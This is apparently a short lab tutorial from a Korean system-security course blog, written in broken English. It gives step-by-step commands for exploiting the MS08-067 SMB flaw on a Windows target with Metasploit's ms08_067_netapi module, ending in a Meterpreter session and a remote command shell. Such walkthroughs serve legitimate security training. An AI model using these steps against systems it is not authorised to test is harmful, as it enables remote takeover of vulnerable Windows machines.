본문 바로가기

NCS/시스템 보안 구축

Metasploit - MS08-067

1. Turn on Kali Linux and Login as a root

2. Execute terminal console

3. Enter "msfconsole"

4. Enter db_connect and you can see that is "postgresql already connected to msf".

if you can't see connect to postgresql first.

How to connect?

That's here

# systemctl start postgresql

# systemctl status postgresql


5. Re-enter "msfconsole" if you did step 4

6. Enter "db_status" in msf prompt

[*] postgresql connected to msf


7. Enter "search ms08"

8. Enter "use exploit/windows/smb/ms08_067_netapi"

9. You can be changed prompt like this "msf exploit(ms08_067_netapi) > " right!!

10. Enter "show options"

11. One information of them you watch Current Setting field. Is it blank?

12 Enter "set RHOST 10.1.10.3" Here IP is target system.

13. Enter "show options". It was 10.1.10.3 in Current Setting field.

14. Enter "info" Can you see like this things that is Available targets: 

15. Enter "exploit" 

If you have successed you can see changed prompt like this metapreter>


16. Enter "shell"

C:\WINDOWS\system32> "Here is target system" Congratulations.